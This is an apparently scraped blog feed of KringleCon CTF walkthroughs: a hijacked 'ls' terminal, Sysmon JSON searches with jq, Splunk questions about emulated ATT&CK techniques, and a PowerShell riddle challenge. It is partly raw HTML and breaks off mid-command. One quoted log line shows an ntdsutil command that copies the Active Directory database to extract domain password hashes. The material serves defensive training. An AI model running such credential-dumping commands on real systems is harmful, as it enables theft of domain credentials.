&lt;/span>&lt;span class="s1">KKKKKKXKKXXKKXNXXNNXNNNNNXl;,:OKXXXNXc&amp;#39;&amp;#39;&amp;#39;&lt;/span>,,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;,KKKKKKXXK,,;:OXKKXKKXKKX0KK0KK0KKK
&lt;/span>&lt;span class="s1">KKKKKKKKXKXXXXXNNXXNNNNW0:;,dXXXXXNK:&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>cKKKKKKKXX&lt;span class="p">;&lt;/span>,,,&lt;span class="p">;&lt;/span>0XKKXKKXKKXKKK0KK0KK
XXKXXXXXXXXXXNNNNNNNNNN0&lt;span class="p">;;;&lt;/span>ONXXXXNO,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>x0KKKKKKXK,&lt;span class="s1">&amp;#39;,,,cXXKKKKKKKKXKKK0KKKX
&lt;/span>&lt;span class="s1">KKKKKKKXKKXXXXNNNNWNNNN:;:KNNXXXXO,&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;..&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>..&lt;span class="s1">&amp;#39;:O00KKKKKXd&amp;#39;&amp;#39;,,,,KKXKKXKKKKKKKKKKKKK
&lt;/span>&lt;span class="s1">KKKKKXKKXXXXXXXXNNXNNNx;cXNXXXXKk,&amp;#39;&amp;#39;&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>.,xO00KKKKKO,&lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>,,,,KK0XKKXKKK0KKKKKKKK
XXXXXXXXXKXXXXXXXNNNNNo&lt;span class="p">;&lt;/span>0NXXXKKO,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;.&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;.;dkOO0KKKK0;.&amp;#39;&amp;#39;,,,,XXXKKK0KK0KKKKKKKKX
&lt;/span>&lt;span class="s1">XKKXXKXXXXXXXXXXXNNNNNcoNNXXKKO,&amp;#39;&amp;#39;&amp;#39;&amp;#39;.&amp;#39;&lt;/span>......:dxkOOO000k,..&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;,,lNXKXKKXKKK0KKKXKKKK
&lt;/span>&lt;span class="s1">KXXKKXXXKXXKXXXXXXXNNNoONNXXX0;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>..&lt;span class="s1">&amp;#39;lkkkkkkxxxd&amp;#39;&lt;/span>...&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>,0N0KKKKKXKKKKKK0XKKK
XXXXXKKXXKXXXXXXXXXXXXOONNNXXl,,&lt;span class="p">;;&lt;/span>,&lt;span class="p">;;;;;;;&lt;/span>d0K00Okddoc,,,,,,,,,xNNOXKKKKKXKKKKKKKXKK
XXXXXXXXXXXXXXXXXXXXXXXONNNXx&lt;span class="p">;;;;;;;;;&lt;/span>,,:xO0KK0Oxdoc,,,,,,,,,oNN0KXXKKXKKXKKKKKKKXK
XKXXKXXXXXXXXXXXXXXXXXXXXWNX:&lt;span class="p">;;;;;;;;;&lt;/span>,cO0KKKK0Okxl,,,,,,,,,oNNK0NXXXXXXXXXKKKKKKKX
XXXXXXXXXXXXXXXXXXXXXXXNNNWNc&lt;span class="p">;;&lt;/span>:&lt;span class="p">;;;;;;&lt;/span>xKXXXXXXKK0x,,,,,,,,,dXNK0NXXXXXXXXXXXKKXKKKK
XKXXXXXXXXXXXXXXXXXXXXNNWWNWd&lt;span class="p">;&lt;/span>:::&lt;span class="p">;;;&lt;/span>:0NNNNNNNNNXO&lt;span class="p">;&lt;/span>,,,,,,,:0NN0XNXNXXXXXXXXXXXKKXKKX
NXXXXXXXXXXXXXXXXXXXXXNNNNNNNl:::&lt;span class="p">;;&lt;/span>:KNNNNNNNNNNO&lt;span class="p">;&lt;/span>,,,,,,&lt;span class="p">;&lt;/span>xNNK0NXNXXNXXXXXXKXXKKKKXKK
XXNNXNNNXXXXXXXXXXXXXNNNNNNNNNkl:&lt;span class="p">;;&lt;/span>xWWNNNNNWWWk&lt;span class="p">;;;;;;;&lt;/span>xNNKKXNXNXXNXXXXXXXXXXXKXKKXK
XXXXXNNNNXNNNNXXXXXXNNNNNNNNNNNNKkolKNNNNNNNNx&lt;span class="p">;;;;;&lt;/span>lkNNXNNNNXXXNXXNXXXXXXXXXXXKKKKX
XXXXXXXXXXXNNNNNNNNNNNNNNNNNNNNNNNNNKXNNNNWNo:clxOXNNNNNNNNXNXXXXXXXXXXXXXXXKKXKKKK
XXXXNXXXNXXXNXXNNNNNWWWWWNNNNNNNNNNNNNNNNNWWNWWNWNNWNNNNNNNNXXXXXXNXXXXXXXXXXKKXKKX
XNXXXXNNXXNXXNNXNXNWWWWWWWWWNNNNNNNNNNNNNWWWWNNNNNNNNNNNNNNNNNNNNNXNXXXXNXXXXXXKXKK
XXXXNXXNNXXXNXXNXXNWWWNNNNNNNNNWWNNNNNNNNWWWWWWNWNNNNNNNNNNNNNNNXXNXNXXXXNXXXXKXKXK
I need to list files in my home/
To check on project logos
But what I see with ls there,
Are quotes from desert hobos...
which piece of my &lt;span class="nb">command&lt;/span> does fail?
I surely cannot find it.
Make straight my path and locate that-
I&lt;span class="s1">&amp;#39;ll praise your skill and sharp wit!
&lt;/span>&lt;span class="s1">Get a listing (ls) of your current directory.
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">elf@b0b213fcf787:~$ ls
&lt;/span>&lt;span class="s1">This isn&amp;#39;&lt;/span>t the ls you&lt;span class="s1">&amp;#39;re looking for
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">elf@b0b213fcf787:~$ which ls
&lt;/span>&lt;span class="s1">/usr/local/bin/ls
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">elf@b0b213fcf787:~$ /bin/ls &amp;lt;&amp;lt; call the original ls directly to solve it
&lt;/span>&lt;span class="s1">&amp;#39;&lt;/span> &lt;span class="err">&amp;#39;&lt;/span> rejected-elfu-logos.txt
Loading, please wait......
You did it! Congratulations!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>A rather simple solution, but don&amp;rsquo;t worry, it will get a bit harder as you progress&amp;hellip; Now, if you go back and click on Mary a few times, she will reveal the hints for solving this objective:&lt;/p>
&lt;blockquote>
&lt;p>Oh there they are! Now I can delete them. Thanks!
Have you tried the Sysmon and EQL challenge?
If you aren&amp;rsquo;t familiar with Sysmon, Carlos Perez has some great info about it.
Haven&amp;rsquo;t heard of the Event Query Language?
Check out some of Ross Wolf&amp;rsquo;s work on EQL or that blog post by Josh Wright in your badge.&lt;/p>
&lt;/blockquote>
&lt;p>Link for EQL: &lt;a href="https://www.endgame.com/our-experts/ross-wolf">https://www.endgame.com/our-experts/ross-wolf&lt;/a>&lt;/p>
&lt;h2 id="main-objective">Main Objective&lt;/h2>
&lt;p>While the provided hint about EQL was interesting, I could not directly use it to solve this challenge. Instead I took a different route. Since the goal is to identify a tool used to extract password hashes from the lsass.exe process, I parsed the Sysmon JSON log file with &lt;code>jq&lt;/code> and then filtered the &lt;strong>command_line&lt;/strong> field for &lt;code>.exe&lt;/code> files.&lt;/p>
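&lt;p>For those without &lt;code>jq&lt;/code> handy, the same filtering takes only a few lines of Python (a sketch, assuming the log file is a JSON array of event objects as in the sample above; the two-event list below is a tiny stand-in for the real file):&lt;/p>

```python
def filter_commands(events: list, needle: str = ".exe") -> list:
    """Collect the distinct command lines containing the given substring."""
    return sorted({e["command_line"] for e in events
                   if needle in e.get("command_line", "")})

# tiny stand-in for the full sysmon-data.json contents
events = [
    {"command_line": "cmd.exe /c echo besewi > \\\\.\\pipe\\besewi"},
    {"command_line": 'ntdsutil.exe "ac i ntds" ifm "create full c:\\hive" q q'},
]
print(filter_commands(events, "ntdsutil"))
```

With the real file loaded via &lt;code>json.load&lt;/code>, swapping the needle from &lt;code>.exe&lt;/code> to &lt;code>ntdsutil&lt;/code> narrows 196 candidates down to the single answer.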
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">$ cat sysmon-data.json &lt;span class="p">|&lt;/span> jq &lt;span class="s1">&amp;#39;.[].command_line&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep &lt;span class="s1">&amp;#39;.exe&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> uniq &lt;span class="p">|&lt;/span> wc -l
&lt;span class="m">196&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>196 is still a rather large number to sift through, so I decided to search the net for &lt;strong>extracting domain password hashes&lt;/strong>, and one of the first few articles pointed me to the &lt;strong>ntdsutil&lt;/strong> utility. I searched for it in the logs and the answer presented itself right away: &lt;strong>ntdsutil&lt;/strong>, which is the solution for Objective #4:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">$ cat sysmon-data.json &lt;span class="p">|&lt;/span> jq &lt;span class="s1">&amp;#39;.[].command_line&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep &lt;span class="s1">&amp;#39;ntdsutil.exe&amp;#39;&lt;/span>
&lt;span class="s2">&amp;#34;ntdsutil.exe \&amp;#34;ac i ntds\&amp;#34; ifm \&amp;#34;create full c:\\hive\&amp;#34; q q&amp;#34;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Splunk Challenge</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective6/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective6/</guid><description>&lt;p>&lt;img src="../images/obj6/objective6.png" alt="Objective6">&lt;/p>
&lt;p>After solving the HID Lock challenge, I continue solving the objectives as Santa, with some special privileges. I can now access various systems that were previously reserved for Santa, like the Splunk terminal in the &lt;code>Great Room&lt;/code>, which used to be locked with the following error message: &lt;code>The Splunk terminal is for Santa and select SOC elves only&lt;/code>&amp;hellip;&lt;/p>
&lt;p>&lt;img src="../images/obj6/great-room.png" alt="Great Room">&lt;/p>
&lt;p>Unfortunately there are no more hints from the elves, only warnings and panic:&lt;/p>
&lt;blockquote>
&lt;p>Hey Santa, there’s some crazy stuff going on that we can see through our Splunk infrastructure. You better login and see what’s up.&lt;/p>
&lt;/blockquote>
&lt;p>Next I click the terminal on the table, which opens Splunk in a
&lt;a href="https://splunk.kringlecastle.com/en-US/app/SA-kringleconsoc/kringleconsoc" target="_blank" rel="noopener">new tab&lt;/a> with the goal of figuring out the answer to the next objective:&lt;/p>
&lt;p>&lt;img src="../images/obj6/splunk-soc.png" alt="Spliunk SOC">&lt;/p>
&lt;p>Thankfully it has a very nice chat interface where &lt;code>Alice Bluebird&lt;/code> helps out with hints for the first few training questions:&lt;/p>
&lt;h4 id="question-1">Question 1&lt;/h4>
&lt;p>&lt;strong>How many distinct MITRE ATT&amp;amp;CK techniques did Alice emulate?&lt;/strong>&lt;/p>
&lt;p>Alice provides the first part of a handy Splunk query, which reveals that the answer is &lt;code>13&lt;/code>:&lt;/p>
&lt;pre>&lt;code>| tstats count where index=* by index
| search index=T*-win OR T*-main
| rex field=index &amp;quot;(?&amp;lt;technique&amp;gt;t\d+)[\.\-].0*&amp;quot;
| stats dc(technique)
&lt;/code>&lt;/pre>&lt;h4 id="question-2">Question 2&lt;/h4>
&lt;p>&lt;strong>What are the names of the two indexes that contain the results of emulating Enterprise ATT&amp;amp;CK technique 1059.003? (Put them in alphabetical order and separate them with a space)&lt;/strong>&lt;/p>
&lt;p>This was also rather easy to answer: &lt;code>t1059.003-main t1059.003-win&lt;/code>&lt;/p>
&lt;h4 id="question-3">Question 3&lt;/h4>
&lt;p>&lt;strong>One technique that Santa had us simulate deals with &amp;lsquo;system information discovery&amp;rsquo;. What is the full name of the registry key that is queried to determine the MachineGuid?&lt;/strong>&lt;/p>
&lt;p>A simple search in Splunk for &lt;code>index=* MachineGuid&lt;/code> reveals entries such as &lt;strong>REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid&lt;/strong> which quickly provides the answer: &lt;code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography&lt;/code>&lt;/p>
&lt;h4 id="question-4">Question 4&lt;/h4>
&lt;p>&lt;strong>According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp)&lt;/strong>&lt;/p>
&lt;p>Following a similar logic, I searched for &lt;code>index=* OSTAP&lt;/code> in Splunk, which retrieved 8 results. I then scrolled down to the bottom to find the oldest one and submitted its timestamp as the answer: &lt;code>2020-11-30T17:44:15Z&lt;/code>&lt;/p>
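&lt;p>Instead of scrolling, Splunk can also surface the oldest event directly: sorting ascending on &lt;code>_time&lt;/code> puts the first occurrence on top. A sketch, assuming the default timestamp field:&lt;/p>
&lt;pre>&lt;code>index=* OSTAP
| sort + _time
| head 1
| table _time
&lt;/code>&lt;/pre>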
&lt;h4 id="question-5">Question 5&lt;/h4>
&lt;p>&lt;strong>One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?&lt;/strong>&lt;/p>
&lt;p>For this one I had to try a bit harder, but after some time spent looking at the &lt;strong>frgnca&lt;/strong> GitHub repo, I figured out that it had something to do with audio, so I crafted this query in Splunk: &lt;code>index=* EventCode=1 AND CommandLine=&amp;quot;*Audio*&amp;quot;&lt;/code>, which helped retrieve the correct answer: &lt;code>3648&lt;/code>&lt;/p>
&lt;h4 id="question-6">Question 6&lt;/h4>
&lt;p>&lt;strong>Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?&lt;/strong>&lt;/p>
&lt;p>This question probably took me the longest to figure out. I spent about 2 hours looking for information in Splunk, and what eventually unblocked me was reading the question over and over again until I realized that the answer would come only partially from Splunk. Eventually I solved it by searching for any occurrence of &lt;code>*.bat&lt;/code> files in Splunk, which helped me find
&lt;a href="https://github.com/redcanaryco/atomic-red-team/blob/8eb52117b748d378325f7719554a896e37bccec7/atomics/T1074.001/src/Discovery.bat" target="_blank" rel="noopener">Discovery.bat&lt;/a> from the Red Canary
&lt;a href="https://github.com/redcanaryco/atomic-red-team" target="_blank" rel="noopener">repo&lt;/a>, which was used to create the simulation. The answer was the final line in this batch script: &lt;code>quser&lt;/code>&lt;/p>
&lt;h4 id="question-7">Question 7&lt;/h4>
&lt;p>&lt;strong>According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?&lt;/strong>&lt;/p>
&lt;p>This was a rather easy one: I searched for &lt;code>index=* SERIAL&lt;/code> in Splunk, which revealed several records. The very first one, right at the top, held the answer: &lt;code>55FCEEBB21270D9249E86F4B9DC7AA60&lt;/code>&lt;/p>
&lt;h3 id="final-question">Final Question&lt;/h3>
&lt;p>&lt;strong>What is the name of the adversary group that Santa feared would attack KringleCon?&lt;/strong>&lt;/p>
&lt;p>For this final question Alice provided a base64-encoded ciphertext that, according to her, was encrypted with Santa&amp;rsquo;s favourite phrase.&lt;/p>
&lt;blockquote>
&lt;p>&lt;code>7FXjP1lyfKbyDK/MChyf36h7&lt;/code>&lt;/p>
&lt;/blockquote>
&lt;p>What&amp;rsquo;s more, she even suggested that the encryption key was mentioned during the KringleCon
&lt;a href="https://www.youtube.com/watch?v=RxVgEFt08kU" target="_blank" rel="noopener">Talk&lt;/a> by Dave Herrald on &lt;strong>Adversary Emulation and Automation&lt;/strong>. I fast-forwarded to the end to find this slide:&lt;/p>
&lt;p>&lt;img src="../images/obj6/stay-frosty.png" alt="Stay Frosty">&lt;/p>
&lt;p>The choice of the RC4 cipher became almost obvious after reading Alice&amp;rsquo;s hint in the Splunk SOC chat (RFC 7465 is the RFC that prohibits the use of RC4 in TLS):&lt;/p>
&lt;blockquote>
&lt;p>It&amp;rsquo;s encrypted with an old algorithm that uses a key. We don&amp;rsquo;t care about RFC 7465 up here! I leave it to the elves to determine which one!&lt;/p>
&lt;/blockquote>
&lt;p>Armed with this knowledge, I used
&lt;a href="https://gchq.github.io/CyberChef/" target="_blank" rel="noopener">CyberChef&lt;/a> and the uncovered passphrase to uncover the name of the adversary group.&lt;/p>
&lt;p>&lt;img src="../images/obj6/adversary-group.png" alt="Adversary Group - CyberChef">&lt;/p>
&lt;p>&lt;img src="../images/obj6/splunk-done.png" alt="Splunk Done">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Network Log Analysis - Determine Compromised System</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective5/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective5/</guid><description>&lt;h2 id="zeek-them-logs">Zeek them logs!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>The attacks don&amp;rsquo;t stop!
Can you help identify the IP address of the malware-infected system using these Zeek logs?
For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.&lt;/p>
&lt;/blockquote>
&lt;p>Link to Zeek
&lt;a href="https://downloads.elfu.org/sysmon-data.json.zip" target="_blank" rel="noopener">logs&lt;/a> which weigh around 300 MB (1.4 GB uncompressed).&lt;/p>
&lt;h2 id="technical-challenge">Technical Challenge&lt;/h2>
&lt;p>Before attacking the Zeek logs, you can look for Sparkle Redberry in the Laboratory for some hints on the main objective. But, as usual, you first need to help him with a side challenge: a laser device that normally generates Xmas Cheer but is now malfunctioning:&lt;/p>
&lt;p>&lt;img src="../images/obj5-sparkle.png" alt="Sparkle Redberry">&lt;/p>
&lt;blockquote>
&lt;p>I&amp;rsquo;m Sparkle Redberry and Imma chargin&amp;rsquo; my laser!
Problem is: the settings are off.
Do you know any PowerShell?
It&amp;rsquo;d be GREAT if you could hop in and recalibrate this thing.
It spreads holiday cheer across the Earth &amp;hellip;
&amp;hellip; when it&amp;rsquo;s working!&lt;/p>
&lt;/blockquote>
&lt;p>So now it&amp;rsquo;s time to dive into the PowerShell terminal sitting on the table, which controls the laser hardware. When you open the terminal you see the below banner:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PowerShell 6.2.3
Copyright &lt;span class="o">(&lt;/span>c&lt;span class="o">)&lt;/span> Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type &lt;span class="s1">&amp;#39;help&amp;#39;&lt;/span> to get help.
🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲
🗲 🗲
🗲 Elf University Student Research Terminal - Christmas Cheer Laser Project 🗲
🗲 ------------------------------------------------------------------------------ 🗲
🗲 The research department at Elf University is currently working on a top-secret 🗲
🗲 Laser which shoots laser beams of Christmas cheer at a range of hundreds of 🗲
🗲 miles. The student research team was successfully able to tweak the laser to 🗲
🗲 JUST the right settings to achieve &lt;span class="m">5&lt;/span> Mega-Jollies per liter of laser output. 🗲
🗲 Unfortunately, someone broke into the research terminal, changed the laser 🗲
🗲 settings through the Web API and left a note behind at /home/callingcard.txt. 🗲
🗲 Read the calling card and follow the clues to find the correct laser Settings. 🗲
🗲 Apply these correct settings to the laser using it&lt;span class="err">&amp;#39;&lt;/span>s Web API to achieve laser 🗲
🗲 output of &lt;span class="m">5&lt;/span> Mega-Jollies per liter. 🗲
🗲 🗲
🗲 Use &lt;span class="o">(&lt;/span>Invoke-WebRequest -Uri http://localhost:1225/&lt;span class="o">)&lt;/span>.RawContent &lt;span class="k">for&lt;/span> more info. 🗲
🗲 🗲
🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲
&lt;/code>&lt;/pre>&lt;/div>&lt;p>You can see some really good hints straight away. Your main task is to calibrate the laser so that it emits at least &lt;strong>5 Mega-Jollies&lt;/strong> per liter of &lt;strong>Xmas Cheer&lt;/strong>. To calibrate it, we can change its &lt;code>angle&lt;/code>, its &lt;code>temperature&lt;/code>, its &lt;code>refraction&lt;/code> and the composition of &lt;code>gases&lt;/code> inside. For the full instructions, execute the command from the banner:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; &lt;span class="o">(&lt;/span>Invoke-WebRequest -Uri http://localhost:1225/&lt;span class="o">)&lt;/span>.RawContent
HTTP/1.0 &lt;span class="m">200&lt;/span> OK
Server: Werkzeug/0.16.0
Server: Python/3.6.9
Date: Sat, &lt;span class="m">28&lt;/span> Dec &lt;span class="m">2019&lt;/span> 21:20:38 GMT
Content-Type: text/html&lt;span class="p">;&lt;/span> &lt;span class="nv">charset&lt;/span>&lt;span class="o">=&lt;/span>utf-8
Content-Length: &lt;span class="m">860&lt;/span>
...
----------------------------------------------------
Christmas Cheer Laser Project Web API
----------------------------------------------------
Turn the laser on/off:
GET http://localhost:1225/api/on
GET http://localhost:1225/api/off
Check the current Mega-Jollies of laser output
GET http://localhost:1225/api/output
Change the lense refraction value &lt;span class="o">(&lt;/span>1.0 - 2.0&lt;span class="o">)&lt;/span>:
GET http://localhost:1225/api/refraction?val&lt;span class="o">=&lt;/span>1.0
Change laser temperature in degrees Celsius:
GET http://localhost:1225/api/temperature?val&lt;span class="o">=&lt;/span>-10
Change the mirror angle value &lt;span class="o">(&lt;/span>&lt;span class="m">0&lt;/span> - 359&lt;span class="o">)&lt;/span>:
GET http://localhost:1225/api/angle?val&lt;span class="o">=&lt;/span>45.1
Change gaseous elements mixture:
POST http://localhost:1225/api/gas
POST BODY EXAMPLE &lt;span class="o">(&lt;/span>gas mixture percentages&lt;span class="o">)&lt;/span>:
&lt;span class="nv">O&lt;/span>&lt;span class="o">=&lt;/span>5&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">H&lt;/span>&lt;span class="o">=&lt;/span>5&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">He&lt;/span>&lt;span class="o">=&lt;/span>5&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">N&lt;/span>&lt;span class="o">=&lt;/span>5&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Ne&lt;/span>&lt;span class="o">=&lt;/span>20&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Ar&lt;/span>&lt;span class="o">=&lt;/span>10&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Xe&lt;/span>&lt;span class="o">=&lt;/span>10&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">F&lt;/span>&lt;span class="o">=&lt;/span>20&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Kr&lt;/span>&lt;span class="o">=&lt;/span>10&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Rn&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">10&lt;/span>
----------------------------------------------------
...
&lt;/code>&lt;/pre>&lt;/div>&lt;p>When I first tried to calibrate the laser, I naively thought I could just enter some random numbers and reach the desired amount of Mega-Jollies by trial and error / brute forcing. But after 10 minutes of messing with the laser parameters, I had to admit that this was not going to work. So I read the banner again and started following the hints.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; get-content /home/callingcard.txt
What&lt;span class="s1">&amp;#39;s become of your dear laser?
&lt;/span>&lt;span class="s1">Fa la la la la, la la la la
&lt;/span>&lt;span class="s1">Seems you can&amp;#39;&lt;/span>t now seem to raise her!
Fa la la la la, la la la la
Could commands hold riddles in hist&lt;span class="s1">&amp;#39;ry?
&lt;/span>&lt;span class="s1">Fa la la la la, la la la la
&lt;/span>&lt;span class="s1">Nay! You&amp;#39;&lt;/span>ll ever suffer myst&lt;span class="err">&amp;#39;&lt;/span>ry!
Fa la la la la, la la la la
PS /home/elf&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This clue is pointing to the command history, so next I Googled how to see PowerShell command history and queried the terminal:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-History
Id CommandLine
-- -----------
&lt;span class="m">1&lt;/span> Get-Help -Name Get-Process
&lt;span class="m">2&lt;/span> Get-Help -Name Get-*
&lt;span class="m">3&lt;/span> Set-ExecutionPolicy Unrestricted
&lt;span class="m">4&lt;/span> Get-Service &lt;span class="p">|&lt;/span> ConvertTo-HTML -Property Name, Status &amp;gt; C:&lt;span class="se">\s&lt;/span>ervices.htm
&lt;span class="m">5&lt;/span> Get-Service &lt;span class="p">|&lt;/span> Export-CSV c:&lt;span class="se">\s&lt;/span>ervice.csv
&lt;span class="m">6&lt;/span> Get-Service &lt;span class="p">|&lt;/span> Select-Object Name, Status &lt;span class="p">|&lt;/span> Export-CSV c:&lt;span class="se">\s&lt;/span>ervice.csv
&lt;span class="m">7&lt;/span> &lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/angle?val&lt;span class="o">=&lt;/span>65.5&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="m">8&lt;/span> Get-EventLog -Log &lt;span class="s2">&amp;#34;Application&amp;#34;&lt;/span>
&lt;span class="m">9&lt;/span> I have many &lt;span class="nv">name&lt;/span>&lt;span class="o">=&lt;/span>value variables that I share to applications system wide. At a comma…
&lt;span class="m">10&lt;/span> &lt;span class="o">(&lt;/span>Invoke-WebRequest -Uri http://localhost:1225/&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="m">11&lt;/span> get-content /home/callingcard.txt
&lt;/code>&lt;/pre>&lt;/div>&lt;p>IDs #7 and #9 both seem interesting. For now we can assume that ID #7 holds the correct value for the angle! I then continued with ID #9, which seemed to hold a truncated message. If only we could reveal the full version. Of course, after a few Google searches, I found just the command I needed.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Invoke-History -Id &lt;span class="m">9&lt;/span>
I have many &lt;span class="nv">name&lt;/span>&lt;span class="o">=&lt;/span>value variables that I share to applications system wide. At a &lt;span class="nb">command&lt;/span> I will reveal my secrets once you Get my Child Items.
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So hidden in the riddle was another riddle. The first sentence suggests we need to look at &lt;strong>environment&lt;/strong> variables, while the second hints at how to get to them. On to Google again, then back to the terminal:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem Env:
Name Value
---- -----
PWD /home/elf
riddle Squeezed and compressed I am hidden away. Expand me from my…
SHELL /home/elf/elf
... ...
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Here we see an environment variable named &lt;strong>riddle&lt;/strong> containing some further clues. However, we need to find a way to expand it so its full content is revealed. This can be done in numerous ways (reading the variable directly as &lt;code>$Env:riddle&lt;/code> also works); the idea I got from my brother, who is a bigger PowerShell guru than I am, was the following:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; &lt;span class="o">(&lt;/span>Get-ChildItem Env:&lt;span class="o">)[&lt;/span>-9&lt;span class="o">]&lt;/span>.Value
Squeezed and compressed I am hidden away. Expand me from my prison and I will show you the way. Recurse through all /etc and Sort on my LastWriteTime to reveal i&lt;span class="err">&amp;#39;&lt;/span>m the newest of all.
PS /home/elf&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The content of the riddle environment variable was now revealed, and it suggested continuing the search in the /etc folder for the file that was modified most recently. Back to Google again for some searching, which produced the commands below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem -Recurse -Path /etc &lt;span class="p">|&lt;/span> Sort LastWriteTime
&lt;span class="o">[&lt;/span>... lots of output omitted &lt;span class="k">for&lt;/span> brievity...&lt;span class="o">]&lt;/span>
Directory: /etc/apt
Mode LastWriteTime Length Name
---- ------------- ------ ----
--r--- 12/28/19 9:46 PM &lt;span class="m">5662902&lt;/span> archive
PS /home/elf&amp;gt; Expand-Archive /etc/apt/archive -DestinationPath ./expanded
PS /home/elf&amp;gt; Get-ChildItem ./expanded/
Directory: /home/elf/expanded
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/28/19 9:53 PM refraction
PS /home/elf&amp;gt; Get-ChildItem ./expanded/refraction/
